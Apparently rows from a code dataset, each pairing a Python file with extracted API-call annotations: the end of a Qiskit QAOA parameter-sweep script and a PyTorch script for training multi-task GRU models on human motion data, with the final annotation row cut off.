                gamma = (gamma + (dgamma * eta)) % (2 * np.pi)
            elif dgamma < 0:
                gamma = (gamma - (dgamma * eta)) % (2 * np.pi)
            dgamma = grad_gamma(gamma, beta)
        else:
            if dbeta > 0:
                beta = (beta + (dbeta * eta)) % np.pi
            elif dbeta < 0:
                beta = (beta - (dbeta * eta)) % np.pi
            dbeta = grad_beta(gamma, beta)
        count += 1
        print("Count", count, "dg", dgamma, "db", dbeta)
        flipper = not flipper
    print(count)
    return gamma, beta
def main():
    """Build the 4-node test graph, sweep gamma at fixed beta, persist the
    expectation curve to JSON, and plot it with error bars."""
    ###TESTING GRAPH
    #0---1
    #| / |
    #3---2
    myGraph = Graph(0, 0)
    nodes = [Node(i) for i in range(4)]
    edges = []
    edges.append(Edge(nodes[0], nodes[1]))
    edges.append(Edge(nodes[1], nodes[2]))
    edges.append(Edge(nodes[2], nodes[3]))
    edges.append(Edge(nodes[3], nodes[0]))
    edges.append(Edge(nodes[3], nodes[1]))
    for n in nodes:
        myGraph.addNode(n)
    for e in edges:
        myGraph.addEdge(e)
    ### Run the algorithm
    #expect = applyQAOA(gamma, beta, myGraph)
    #print("Expectation Value:", expect)
    ### OPTIMIZE
    #bestGamma, bestBeta = optimize(myGraph, 0.1, 0.1, 0.05)
    #print("BestGamma: ", bestGamma, "bestBeta", bestBeta)
    #print("Optimized Expectation value", applyQAOA(bestGamma, bestBeta, myGraph))
    #print("Optimal Gamma:", bestGamma, "Optimal Beta:", bestBeta)
    #BestGamma: 4.6015625 bestBeta 0.18702062766020688
    #Optimized Expectation value -0.3115234375
    ### Make graphs.
    # I'm thinking we hold one variable constant at its maxed value
    # and vary the other and vice versa.
    # Gamma has a larger range than beta. Do we want more data points for gamma than beta?
    # The last page of the worksheet says exactly which graphs we need in our report
    # so make sure we have at least those
    # Hard-coded optimum found by a previous `optimize` run (see comments above).
    BestGamma = 4.6015625
    BestBeta = 0.18702062766020688
    betas = np.linspace(0, np.pi, 10)
    gammas = np.linspace(0, 2*np.pi, 100)
    varyingBeta = []
    varyingGamma = []
    betaSTD = []
    gammaSTD = []
    y = []
    std = []
    # Sweep gamma at fixed BestBeta, collecting expectation and std per point.
    for gammaa in gammas:
        e, s = applyQAOA(gammaa, BestBeta, myGraph)
        y.append(e)
        std.append(s)
    with open("varyingGamma.txt", 'w') as f:
        json.dump(y, f)
    with open("gammaSTD.txt", 'w') as f:
        json.dump(std, f)
    """
    y = []
    std = []
    for betaa in betas:
        e, s = applyQAOA(BestGamma, betaa, myGraph)
        y.append(e)
        std.append(s)
    with open("varyingBeta.txt", 'w') as f:
        json.dump(y, f)
    with open("betaSTD.txt", 'w') as f:
        json.dump(std, f)
    """
    # Re-load the just-written results (kept so the plotting half can be run
    # standalone against previously saved sweeps).
    with open("varyingGamma.txt", 'r') as f:
        varyingGamma = json.load(f)
    #with open("varyingBeta.txt", 'r') as f:
    #    varyingBeta = json.load(f)
    #with open("betaSTD.txt", 'r') as f:
    #    betaSTD = json.load(f)
    with open("gammaSTD.txt", 'r') as f:
        gammaSTD = json.load(f)
    #betaG = plt.errorbar(betas, varyingBeta, betaSTD, ecolor='black', elinewidth = 0.5, capsize=3)
    gammaG = plt.errorbar(gammas, varyingGamma, gammaSTD, ecolor='black', elinewidth = 0.5, capsize=3)
    plt.legend(('Gamma Graph',))
    plt.xlabel('Gamma values')
    plt.ylabel('Expectation Value')
    plt.title('Expectation Value vs Gamma holding Beta constant')
    plt.show()
main()
| [
"qiskit.ClassicalRegister",
"matplotlib.pyplot.title",
"qiskit.execute",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"json.dump",
"numpy.binary_repr",
"numpy.linspace",
"matplotlib.pyplot.errorbar",
"json.load",
"qiskit.QuantumCircuit",
"qiskit.QuantumRegister",
"matplotlib.pyplo... | [((162, 202), 'qiskit.QuantumRegister', 'qiskit.QuantumRegister', (['(inbits + outbits)'], {}), '(inbits + outbits)\n', (184, 202), False, 'import qiskit\n'), ((209, 251), 'qiskit.ClassicalRegister', 'qiskit.ClassicalRegister', (['(inbits + outbits)'], {}), '(inbits + outbits)\n', (233, 251), False, 'import qiskit\n'), ((259, 286), 'qiskit.QuantumCircuit', 'qiskit.QuantumCircuit', (['q', 'c'], {}), '(q, c)\n', (280, 286), False, 'import qiskit\n'), ((619, 681), 'qiskit.execute', 'qiskit.execute', (['qc'], {'backend': '"""local_qasm_simulator"""', 'shots': '(1024)'}), "(qc, backend='local_qasm_simulator', shots=1024)\n", (633, 681), False, 'import qiskit\n'), ((1179, 1201), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Outcomes"""'], {}), "('Outcomes')\n", (1189, 1201), True, 'import matplotlib.pyplot as plt\n'), ((1206, 1226), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Counts"""'], {}), "('Counts')\n", (1216, 1226), True, 'import matplotlib.pyplot as plt\n'), ((1231, 1265), 'matplotlib.pyplot.title', 'plt.title', (['"""Measurement Histogram"""'], {}), "('Measurement Histogram')\n", (1240, 1265), True, 'import matplotlib.pyplot as plt\n'), ((1270, 1280), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1278, 1280), True, 'import matplotlib.pyplot as plt\n'), ((6086, 6111), 'numpy.linspace', 'np.linspace', (['(0)', 'np.pi', '(10)'], {}), '(0, np.pi, 10)\n', (6097, 6111), True, 'import numpy as np\n'), ((6125, 6155), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(100)'], {}), '(0, 2 * np.pi, 100)\n', (6136, 6155), True, 'import numpy as np\n'), ((7261, 7352), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['gammas', 'varyingGamma', 'gammaSTD'], {'ecolor': '"""black"""', 'elinewidth': '(0.5)', 'capsize': '(3)'}), "(gammas, varyingGamma, gammaSTD, ecolor='black', elinewidth=0.5,\n capsize=3)\n", (7273, 7352), True, 'import matplotlib.pyplot as plt\n'), ((7355, 7383), 'matplotlib.pyplot.legend', 'plt.legend', (["('Gamma 
Graph',)"], {}), "(('Gamma Graph',))\n", (7365, 7383), True, 'import matplotlib.pyplot as plt\n'), ((7388, 7414), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Gamma values"""'], {}), "('Gamma values')\n", (7398, 7414), True, 'import matplotlib.pyplot as plt\n'), ((7419, 7450), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Expectation Value"""'], {}), "('Expectation Value')\n", (7429, 7450), True, 'import matplotlib.pyplot as plt\n'), ((7455, 7516), 'matplotlib.pyplot.title', 'plt.title', (['"""Expectation Value vs Gamma holding Beta constant"""'], {}), "('Expectation Value vs Gamma holding Beta constant')\n", (7464, 7516), True, 'import matplotlib.pyplot as plt\n'), ((7521, 7531), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7529, 7531), True, 'import matplotlib.pyplot as plt\n'), ((929, 955), 'numpy.binary_repr', 'np.binary_repr', (['i'], {'width': 'n'}), '(i, width=n)\n', (943, 955), True, 'import numpy as np\n'), ((6440, 6455), 'json.dump', 'json.dump', (['y', 'f'], {}), '(y, f)\n', (6449, 6455), False, 'import json\n'), ((6506, 6523), 'json.dump', 'json.dump', (['std', 'f'], {}), '(std, f)\n', (6515, 6523), False, 'import json\n'), ((6897, 6909), 'json.load', 'json.load', (['f'], {}), '(f)\n', (6906, 6909), False, 'import json\n'), ((7130, 7142), 'json.load', 'json.load', (['f'], {}), '(f)\n', (7139, 7142), False, 'import json\n')] |
"""Simple code for training an RNN for motion prediction."""
import os
import sys
import time
import numpy as np
import torch
import torch.optim as optim
from torch.autograd import Variable
import mtfixb_model
import mtfixb_model2
import parseopts
def create_model(args, total_num_batches):
    """Create an MT model, or load a saved one when `args.load` is given.

    Dispatch order: saved checkpoint > k == 0 (open-loop GRU) > dynamicsdict
    > biasonly > nobias > full MTGRU (optionally warm-starting layer 1 from
    `args.load_layer1`).
    """
    if len(args.load) > 0:
        # A saved checkpoint takes precedence over constructing a new model.
        print("Loading model")
        return torch.load(args.load, map_location="cpu") if args.use_cpu else torch.load(args.load)
    if args.k == 0:
        return create_model_k0(args, total_num_batches)
    if args.dynamicsdict:
        return create_model_DD(args, total_num_batches)
    if args.biasonly:
        return create_model_BiasOnly(args, total_num_batches)
    if args.nobias:
        return create_model_NoMTBias(args, total_num_batches)
    model = mtfixb_model.MTGRU(
        args.seq_length_out,
        args.decoder_size,
        args.decoder_size2,
        args.batch_size,
        total_num_batches,
        args.k,
        args.size_psi_hidden,
        args.size_psi_lowrank,
        args.bottleneck,
        output_dim=args.human_size,
        input_dim=args.input_size,
        dropout=args.dropout_p,
        residual_output=args.residual_velocities,
        init_state_noise=args.init_state_noise,
        mt_rnn=args.mt_rnn,
        psi_affine=args.psi_affine,
    )
    # BUG FIX: the original re-tested `len(args.load) <= 0` here and carried an
    # unreachable duplicate `torch.load` branch — `args.load` was already
    # handled by the early return at the top of this function.
    if len(args.load_layer1) > 0:
        print("Loading GRU2 model")
        model = load_layer1(model, args.load_layer1, args.use_cpu)
    return model
def create_model_k0(args, total_num_batches):
    """Create the open-loop GRU baseline used when k == 0 (no MT latent).

    `total_num_batches` is accepted for interface parity with the other
    constructors but is not used by this model.
    """
    return mtfixb_model.OpenLoopGRU(
        args.seq_length_out,
        args.decoder_size,
        args.batch_size,
        args.human_size,
        args.input_size,
        args.dropout_p,
        args.residual_velocities,
        args.init_state_noise,
    )
def create_model_DD(args, total_num_batches):
    """Create the DynamicsDict MT model and initialize parameters.

    Raises:
        NotImplementedError: if `args.load_layer1` is set — layer-1 loading
            is not implemented for DynamicsDict.
    """
    if len(args.load_layer1) > 0:
        # BUG FIX: the exception was previously constructed but never raised,
        # so an unsupported --load_layer1 option was silently ignored.
        raise NotImplementedError("Layer 1 load not yet implemented for Dynamics Dict.")
    model = mtfixb_model.DynamicsDict(
        args.seq_length_out,
        args.decoder_size,
        total_num_batches,
        args.batch_size,
        args.k,
        args.size_psi_hidden,
        args.size_psi_lowrank,
        args.human_size,
        args.input_size,
        args.dropout_p,
        args.residual_velocities,
        args.init_state_noise,
    )
    return model
def create_model_BiasOnly(args, total_num_batches):
    """Create the MTGRU_BiasOnly model and initialize parameters.

    Raises:
        NotImplementedError: if `args.load_layer1` is set — layer-1 loading
            is not implemented for the bias-only variant.
    """
    if len(args.load_layer1) > 0:
        # BUG FIX: the exception was previously constructed but never raised,
        # so an unsupported --load_layer1 option was silently ignored.
        raise NotImplementedError("Layer 1 load not yet implemented for MT Bias Only.")
    model = mtfixb_model.MTGRU_BiasOnly(
        args.seq_length_out,
        args.decoder_size,
        args.decoder_size2,
        args.batch_size,
        total_num_batches,
        args.k,
        args.size_psi_hidden,
        args.size_psi_lowrank,
        args.bottleneck,
        output_dim=args.human_size,
        input_dim=args.input_size,
        dropout=args.dropout_p,
        residual_output=args.residual_velocities,
        init_state_noise=args.init_state_noise,
    )
    return model
def create_model_NoMTBias(args, total_num_batches):
    """Create the MTGRU_NoBias model and initialize parameters.

    Raises:
        NotImplementedError: if `args.load_layer1` is set — layer-1 loading
            is not implemented for the no-bias variant.
    """
    if len(args.load_layer1) > 0:
        # BUG FIX: the exception was previously constructed but never raised,
        # so an unsupported --load_layer1 option was silently ignored.
        raise NotImplementedError("Layer 1 load not yet implemented for MT Bias Only.")
    model = mtfixb_model2.MTGRU_NoBias(
        args.seq_length_out,
        args.decoder_size,
        args.decoder_size2,
        args.batch_size,
        total_num_batches,
        args.k,
        args.size_psi_hidden,
        args.size_psi_lowrank,
        args.bottleneck,
        output_dim=args.human_size,
        input_dim=args.input_size,
        dropout=args.dropout_p,
        residual_output=args.residual_velocities,
        init_state_noise=args.init_state_noise,
        mt_rnn=args.mt_rnn,
        psi_affine=args.psi_affine,
    )
    return model
def train(args):
    """Train a MT model on human motion.

    Builds the data iterator and model from `args`, then runs
    `args.iterations` optimisation steps of the (optionally AR-weighted)
    squared-error loss plus, for MT models, the KL term of the variational
    bound. Checkpoints to `args.train_dir` every `args.test_every` steps.
    """
    train_iter = read_all_data(args)
    train_iter.shuffle()
    total_num_batches = train_iter.total_length()
    model = create_model(args, total_num_batches)
    model = model if args.use_cpu else model.cuda()
    has_weight = not np.isclose(args.first3_prec, 1.0)
    is_hard_em = args.hard_em_iters > 0
    is_MT = args.k > 0
    current_step = 0
    previous_losses = []
    step_time, loss = 0, 0
    # Per-parameter-group learning rates: negative CLI values fall back to the
    # global learning rate; the z latent group is frozen during hard-EM warmup.
    mt_lr = args.learning_rate_mt if args.learning_rate_mt >= 0 else args.learning_rate
    z_lr = args.learning_rate_z if args.learning_rate_z >= 0 else args.learning_rate
    zls_lr = 0 if is_hard_em else z_lr
    pars_lrs, zls_ix = model.get_params_optim_dicts(mt_lr, args.learning_rate, z_lr, zls_lr=zls_lr)
    if args.optimiser.upper() == "SGD":
        optimiser = optim.SGD(pars_lrs, weight_decay=args.weight_decay)
    elif args.optimiser.upper() == "NESTEROV":
        optimiser = optim.SGD(pars_lrs, momentum=0.8, nesterov=True, weight_decay=args.weight_decay)
    elif args.optimiser.upper() == "ADAM":
        optimiser = optim.Adam(pars_lrs, betas=(0.9, 0.999), weight_decay=args.weight_decay)
    else:
        # BUG FIX: the Exception was previously constructed but never raised,
        # which let execution continue and crash later with a NameError on
        # `optimiser`. Fail fast with a descriptive error instead.
        raise ValueError("Unknown optimiser type: {0}. Try 'SGD', 'Nesterov' or 'Adam'".format(args.optimiser))
    has_ar_noise = args.ar_coef > 0
    device = "cpu" if args.use_cpu else "cuda"
    if has_ar_noise:
        assert args.ar_coef < 1, "ar_coef must be in [0, 1)."
        # Construct banded AR precision matrix (fn def below)
        Prec = ar_prec_matrix(args.ar_coef, args.seq_length_out).float().to(device)
    for _ in range(args.iterations):
        optimiser.zero_grad()
        model.train()
        start_time = time.time()
        # ------------------------------------------------------- TRAINING
        inputs, outputs, c_ids = model.get_batch(train_iter)
        inputs, outputs = torchify(inputs, outputs, device=device)
        if is_MT:
            # Variational posterior over the per-sequence latent z.
            mu = model.mt_net.Z_mu[c_ids, :]
            sd = torch.sigmoid(3 * model.mt_net.Z_logit_s[c_ids, :])
            preds, _state = model(inputs, mu, sd)
        else:
            preds, _state = model(inputs)
        err = preds - outputs
        if has_weight:
            # Up/down-weight the first 3 output dims (root trajectory) by first3_prec.
            err = err * torch.cat(
                (torch.ones(1, 1, 3) * np.sqrt(args.first3_prec), torch.ones(1, 1, args.human_size - 3)), dim=2
            ).to(err.device)
        if not has_ar_noise:
            sqerr = err ** 2
        else:
            sqerr = (Prec @ err) * err
        step_loss = args.human_size * args.seq_length_out * sqerr.mean() / 2
        # assume \sigma is const. wrt optimisation, and hence normalising constant can be ignored.
        # Now for KL term. Since we're descending *negative* L.B., we need to *ADD* KL to loss:
        if is_MT:
            logstd = torch.log(sd)
            KLD = -0.5 * torch.sum(1 + 2 * logstd - mu.pow(2) - torch.exp(2 * logstd))
            step_loss = step_loss + KLD
        # Actual backpropagation
        step_loss.backward()
        optimiser.step()
        # -------------------------------------------------------
        # Reporting / admin
        step_loss = step_loss.cpu().data.numpy()
        if current_step % 10 == 0:
            if is_MT:
                KLD_part = KLD.cpu().data.numpy()
                print(
                    "step {0:04d}; step_loss: {1:.4f} ({2:.4f})".format(current_step, step_loss, step_loss - KLD_part)
                )
            else:
                print("step {0:04d}; step_loss: {1:.4f}".format(current_step, step_loss))
        step_time += (time.time() - start_time) / args.test_every
        loss += step_loss / args.test_every
        current_step += 1
        if current_step % 20 == 0:
            sys.stdout.flush()
        # Decay learning rate (if appl.)
        if current_step % args.learning_rate_step == 0:
            for param_group in optimiser.param_groups:
                param_group["lr"] *= args.learning_rate_decay_factor
            print("Decay learning rate. New value at " + str(optimiser.param_groups[0]["lr"]))
        # remove Hard EM spec (if appl.)
        if is_hard_em and zls_ix is not None and current_step == args.hard_em_iters:
            optimiser.param_groups[zls_ix]["lr"] = z_lr
            model.standardise_aggregate_posterior()
        # Once in a while, we save checkpoint, print statistics, and run evals.
        if current_step % args.test_every == 0:
            model.eval()
            # === CANNOT DO TEST SET EVALUATION SINCE DONT KNOW LATENT Z ===
            # inputs, outputs = model.get_test_batch(test_set_Y, test_set_U, -1)
            # inputs, outputs = torchify(inputs, outputs, device=device)
            #
            # if is_MT:
            #     preds, state = model(inputs, mu, sd)
            # else:
            #     preds = model(inputs)
            #
            # err = (preds - outputs)
            # if has_weight:
            #     err = err * torch.cat((torch.ones(1, 1, 3) * np.sqrt(args.first3_prec),
            #                             torch.ones(1, 1, args.human_size - 3)), dim=2).to(err.device)
            #
            # if not has_ar_noise:
            #     sqerr = err ** 2
            # else:
            #     Prec_test = ar_prec_matrix(args.ar_coef, err.size(1)).float().to(device)
            #     sqerr = (Prec_test @ err) * err
            #
            # val_loss = args.human_size * args.seq_length_out * sqerr.mean() / 2
            #
            # if is_MT:
            #     logstd = torch.log(sd)
            #     KLD = -0.5 * torch.sum(1 + 2 * logstd - mu.pow(2) - torch.exp(2 * logstd))
            #     val_loss = val_loss + KLD
            #
            # print()
            # print("{0: <16} |".format("milliseconds"), end="")
            # for ms in [60, 240, 480, 750, 990, 1500, 2010]:
            #     print(" {0:5d} |".format(ms), end="")
            # print()
            #
            # avg_mse_tt = sqerr.detach().cpu().mean(dim=0).numpy().mean(axis=1)
            # Pretty print of the results for 60, 240, 480, 750, 990, 1500, 2010 ms
            # print("{0: <16} |".format(" "), end="")
            # for ms in [1, 7, 15, 24, 32, 49, 66]:
            #     if args.seq_length_out >= ms + 1:
            #         print(" {0:.3f} |".format(avg_mse_tt[ms]), end="")
            #     else:
            #         print("   n/a |", end="")
            # print()
            #
            # print()
            # print("============================\n"
            #       "Global step:         %d\n"
            #       "Learning rate:       %.4f\n"
            #       "Step-time (ms):     %.4f\n"
            #       "Train loss avg:      %.4f\n"
            #       "--------------------------\n"
            #       "Test loss:            %.4f\n"
            #       "============================" % (current_step,
            #                                         args.learning_rate, step_time * 1000, loss,
            #                                         val_loss))
            torch.save(model, args.train_dir + "/model_" + str(current_step))
            # print()
            previous_losses.append(loss)
            # Reset global time and loss
            step_time, loss = 0, 0
            sys.stdout.flush()
def sample(args):
    """Generate predictions from a trained model (currently disabled).

    The unconditional raise below makes everything that follows dead code;
    it is kept as a sketch of the intended sampling flow.
    """
    raise NotImplementedError("Sampling not yet implemented: unsure how to deal with unknown latent z.")
    # --- unreachable below this line ---
    train_set_Y, train_set_U, test_set_Y, test_set_U = read_all_data(args)
    # NOTE(review): create_model now takes (args, total_num_batches); this
    # one-argument call would fail if the raise above were removed.
    model = create_model(args)
    model.eval()
    if not args.use_cpu:
        model = model.cuda()
    print("Model created")
    inputs, outputs = model.get_test_batch(test_set_Y, test_set_U, -1)
    inputs = Variable(torch.from_numpy(inputs).float())
    outputs = Variable(torch.from_numpy(outputs).float())
    if not args.use_cpu:
        # NOTE(review): .cuda() results are discarded here — this line has no effect.
        inputs, outputs, inputs.cuda(), outputs.cuda()
    if args.k > 0:
        preds, mu, logstd, state = model(inputs, outputs)
    else:
        preds = model(inputs)
    loss = (preds - outputs) ** 2
    loss.cpu().data.numpy()
    loss = loss.mean()
    preds = preds.cpu().data.numpy()
    preds = preds.transpose([1, 0, 2])
    loss = loss.cpu().data.numpy()
    np.savez("mt_predictions_{0}.npz".format(args.style_ix), preds=preds, actual=outputs)
    return
def ar_prec_matrix(rho, n):
    """Precision (inverse covariance) matrix of an AR(1) process.

    Up to boundary terms, the AR(1) precision is symmetric tridiagonal:
    (1 + rho^2) on the diagonal and -rho on both first off-diagonals.

    Args:
        rho: AR(1) coefficient (callers assert 0 <= rho < 1).
        n: matrix dimension.

    Returns:
        torch.Tensor of shape (n, n), dtype float64.
    """
    Prec = np.zeros((n, n))
    i, j = np.indices(Prec.shape)
    Prec[i == j] = 1 + rho ** 2
    Prec[i == j - 1] = -rho
    # BUG FIX: was `Prec[i == j + 2] = -rho`, which placed the lower band two
    # steps below the diagonal and produced an asymmetric matrix. The AR(1)
    # precision band sits at lag 1 on both sides of the diagonal.
    Prec[i == j + 1] = -rho
    return torch.tensor(Prec)
def load_layer1(model, layer1_filename, use_cpu):
    """Warm-start `model`'s first-layer RNN from a saved checkpoint.

    OpenLoopGRU checkpoints expose the recurrent net as `.rnn`; every other
    model type stores it as `.rnn2`. Returns the mutated `model`.
    """
    if use_cpu:
        pretrained = torch.load(layer1_filename, map_location="cpu")
    else:
        pretrained = torch.load(layer1_filename)
    if isinstance(pretrained, mtfixb_model.OpenLoopGRU):
        model.layer1_rnn = pretrained.rnn
        # model.layer1_linear = model_gru2.emission
    else:
        model.layer1_rnn = pretrained.rnn2
    return model
def read_all_data(args):
    """
    Loads data for training/testing and normalizes it.

    Args
      data_dir: directory to load the data from
      style_ix: style index of the test set (and leave out from the training set)
      njoints: number of joints to model (0 or -1 = all)
    Returns
      train_set: dictionary with normalized training data
      test_set: dictionary with test data
      data_mean: d-long vector with the mean of the training data
      data_std: d-long vector with the standard dev of the training data
      dim_to_ignore: dimensions that are not used becaused stdev is too small
      dim_to_use: dimensions that we are actually using in the model

    NOTE(review): despite the docstring above, this function actually returns
    a single mtfixb_model.DataIterator over the training sequences.
    """
    # === Read training data ===
    print("Reading training data (test index {0:d}).".format(args.style_ix))
    njoints = args.human_size
    # Build the style -> file-index lookup either analytically (fixed-size
    # training sets) or from a saved lookup file.
    if not args.train_set_size == -1:
        style_lkp = {
            str(i): range(1 + args.train_set_size * (i - 1), 1 + args.train_set_size * i) for i in range(1, 8 + 1)
        }
    else:
        style_lkp = np.load(os.path.join(args.data_dir, args.stylelkp_fname))
    train_set_Y = np.load(os.path.join(args.data_dir, args.output_fname))
    train_set_U = np.load(os.path.join(args.data_dir, args.input_fname))
    # Infer joint count from the data when not specified.
    # NOTE(review): this indexes key "0" while the branches below use 1-based
    # keys — confirm the archive actually contains a "0" entry.
    njoints = train_set_Y[str(0)].shape[1] if njoints <= 0 else njoints
    if args.train_set_size != 0:
        # Leave-one-style-out: concatenate indices of every style except style_ix.
        train_ixs = np.concatenate(
            [
                style_lkp[str(i)] for i in range(1, len(style_lkp.keys()) + 1) if i != args.style_ix
            ]  # CAREFUL: jl is 1-based!
        )
        train_set_Y = [train_set_Y[str(i)][:, :njoints] for i in train_ixs]
        train_set_U = [train_set_U[str(i)] for i in train_ixs]
    else:
        assert args.style_ix not in range(1, 9), "no support for LOO experiments with max MTL data yet. Use style_ix=9"
        train_set_Y = [train_set_Y[str(i + 1)][:, :njoints] for i in range(len(train_set_Y))]
        train_set_U = [train_set_U[str(i + 1)] for i in range(len(train_set_U))]
    print("Using files {:s}; {:s}".format(args.input_fname, args.output_fname))
    print("done reading data.")
    return mtfixb_model.DataIterator(train_set_Y, train_set_U, 64, min_size=64, overlap2=args.overlap_windows)
def torchify(*args, device="cpu"):
    """Convert each numpy array to a float32 Variable on `device`.

    Returns a list in the same order as the inputs.
    """
    converted = []
    for array in args:
        tensor = torch.from_numpy(array).float()
        converted.append(Variable(tensor).to(device))
    return converted
def main(args=None):
    """Entry point: parse options, prepare the run directory, then train or sample.

    Returns the fully transformed options namespace.
    """
    opts = parseopts.parse_args(args)
    opts = parseopts.initial_arg_transform(opts)
    print(opts.train_dir)
    os.makedirs(opts.train_dir, exist_ok=True)
    if opts.sample:
        sample(opts)
    else:
        train(opts)
    return opts


if __name__ == "__main__":
    main()
| [
"numpy.sqrt",
"torch.from_numpy",
"parseopts.parse_args",
"torch.exp",
"parseopts.initial_arg_transform",
"mtfixb_model2.MTGRU_NoBias",
"mtfixb_model.MTGRU",
"mtfixb_model.DataIterator",
"mtfixb_model.OpenLoopGRU",
"sys.stdout.flush",
"torch.optim.SGD",
"mtfixb_model.DynamicsDict",
"numpy.in... | [((890, 1307), 'mtfixb_model.MTGRU', 'mtfixb_model.MTGRU', (['args.seq_length_out', 'args.decoder_size', 'args.decoder_size2', 'args.batch_size', 'total_num_batches', 'args.k', 'args.size_psi_hidden', 'args.size_psi_lowrank', 'args.bottleneck'], {'output_dim': 'args.human_size', 'input_dim': 'args.input_size', 'dropout': 'args.dropout_p', 'residual_output': 'args.residual_velocities', 'init_state_noise': 'args.init_state_noise', 'mt_rnn': 'args.mt_rnn', 'psi_affine': 'args.psi_affine'}), '(args.seq_length_out, args.decoder_size, args.\n decoder_size2, args.batch_size, total_num_batches, args.k, args.\n size_psi_hidden, args.size_psi_lowrank, args.bottleneck, output_dim=\n args.human_size, input_dim=args.input_size, dropout=args.dropout_p,\n residual_output=args.residual_velocities, init_state_noise=args.\n init_state_noise, mt_rnn=args.mt_rnn, psi_affine=args.psi_affine)\n', (908, 1307), False, 'import mtfixb_model\n'), ((1893, 2083), 'mtfixb_model.OpenLoopGRU', 'mtfixb_model.OpenLoopGRU', (['args.seq_length_out', 'args.decoder_size', 'args.batch_size', 'args.human_size', 'args.input_size', 'args.dropout_p', 'args.residual_velocities', 'args.init_state_noise'], {}), '(args.seq_length_out, args.decoder_size, args.\n batch_size, args.human_size, args.input_size, args.dropout_p, args.\n residual_velocities, args.init_state_noise)\n', (1917, 2083), False, 'import mtfixb_model\n'), ((2414, 2680), 'mtfixb_model.DynamicsDict', 'mtfixb_model.DynamicsDict', (['args.seq_length_out', 'args.decoder_size', 'total_num_batches', 'args.batch_size', 'args.k', 'args.size_psi_hidden', 'args.size_psi_lowrank', 'args.human_size', 'args.input_size', 'args.dropout_p', 'args.residual_velocities', 'args.init_state_noise'], {}), '(args.seq_length_out, args.decoder_size,\n total_num_batches, args.batch_size, args.k, args.size_psi_hidden, args.\n size_psi_lowrank, args.human_size, args.input_size, args.dropout_p,\n args.residual_velocities, args.init_state_noise)\n', (2439, 
2680), False, 'import mtfixb_model\n'), ((3045, 3423), 'mtfixb_model.MTGRU_BiasOnly', 'mtfixb_model.MTGRU_BiasOnly', (['args.seq_length_out', 'args.decoder_size', 'args.decoder_size2', 'args.batch_size', 'total_num_batches', 'args.k', 'args.size_psi_hidden', 'args.size_psi_lowrank', 'args.bottleneck'], {'output_dim': 'args.human_size', 'input_dim': 'args.input_size', 'dropout': 'args.dropout_p', 'residual_output': 'args.residual_velocities', 'init_state_noise': 'args.init_state_noise'}), '(args.seq_length_out, args.decoder_size, args.\n decoder_size2, args.batch_size, total_num_batches, args.k, args.\n size_psi_hidden, args.size_psi_lowrank, args.bottleneck, output_dim=\n args.human_size, input_dim=args.input_size, dropout=args.dropout_p,\n residual_output=args.residual_velocities, init_state_noise=args.\n init_state_noise)\n', (3072, 3423), False, 'import mtfixb_model\n'), ((3793, 4218), 'mtfixb_model2.MTGRU_NoBias', 'mtfixb_model2.MTGRU_NoBias', (['args.seq_length_out', 'args.decoder_size', 'args.decoder_size2', 'args.batch_size', 'total_num_batches', 'args.k', 'args.size_psi_hidden', 'args.size_psi_lowrank', 'args.bottleneck'], {'output_dim': 'args.human_size', 'input_dim': 'args.input_size', 'dropout': 'args.dropout_p', 'residual_output': 'args.residual_velocities', 'init_state_noise': 'args.init_state_noise', 'mt_rnn': 'args.mt_rnn', 'psi_affine': 'args.psi_affine'}), '(args.seq_length_out, args.decoder_size, args.\n decoder_size2, args.batch_size, total_num_batches, args.k, args.\n size_psi_hidden, args.size_psi_lowrank, args.bottleneck, output_dim=\n args.human_size, input_dim=args.input_size, dropout=args.dropout_p,\n residual_output=args.residual_velocities, init_state_noise=args.\n init_state_noise, mt_rnn=args.mt_rnn, psi_affine=args.psi_affine)\n', (3819, 4218), False, 'import mtfixb_model2\n'), ((12744, 12760), 'numpy.zeros', 'np.zeros', (['(n, n)'], {}), '((n, n))\n', (12752, 12760), True, 'import numpy as np\n'), ((12772, 12794), 'numpy.indices', 
'np.indices', (['Prec.shape'], {}), '(Prec.shape)\n', (12782, 12794), True, 'import numpy as np\n'), ((12894, 12912), 'torch.tensor', 'torch.tensor', (['Prec'], {}), '(Prec)\n', (12906, 12912), False, 'import torch\n'), ((15429, 15532), 'mtfixb_model.DataIterator', 'mtfixb_model.DataIterator', (['train_set_Y', 'train_set_U', '(64)'], {'min_size': '(64)', 'overlap2': 'args.overlap_windows'}), '(train_set_Y, train_set_U, 64, min_size=64,\n overlap2=args.overlap_windows)\n', (15454, 15532), False, 'import mtfixb_model\n'), ((15680, 15706), 'parseopts.parse_args', 'parseopts.parse_args', (['args'], {}), '(args)\n', (15700, 15706), False, 'import parseopts\n'), ((15718, 15755), 'parseopts.initial_arg_transform', 'parseopts.initial_arg_transform', (['args'], {}), '(args)\n', (15749, 15755), False, 'import parseopts\n'), ((15787, 15829), 'os.makedirs', 'os.makedirs', (['args.train_dir'], {'exist_ok': '(True)'}), '(args.train_dir, exist_ok=True)\n', (15798, 15829), False, 'import os\n'), ((1658, 1699), 'torch.load', 'torch.load', (['args.load'], {'map_location': '"""cpu"""'}), "(args.load, map_location='cpu')\n", (1668, 1699), False, 'import torch\n'), ((1721, 1742), 'torch.load', 'torch.load', (['args.load'], {}), '(args.load)\n', (1731, 1742), False, 'import torch\n'), ((4649, 4682), 'numpy.isclose', 'np.isclose', (['args.first3_prec', '(1.0)'], {}), '(args.first3_prec, 1.0)\n', (4659, 4682), True, 'import numpy as np\n'), ((5194, 5245), 'torch.optim.SGD', 'optim.SGD', (['pars_lrs'], {'weight_decay': 'args.weight_decay'}), '(pars_lrs, weight_decay=args.weight_decay)\n', (5203, 5245), True, 'import torch.optim as optim\n'), ((6048, 6059), 'time.time', 'time.time', ([], {}), '()\n', (6057, 6059), False, 'import time\n'), ((12982, 13029), 'torch.load', 'torch.load', (['layer1_filename'], {'map_location': '"""cpu"""'}), "(layer1_filename, map_location='cpu')\n", (12992, 13029), False, 'import torch\n'), ((13046, 13073), 'torch.load', 'torch.load', (['layer1_filename'], {}), 
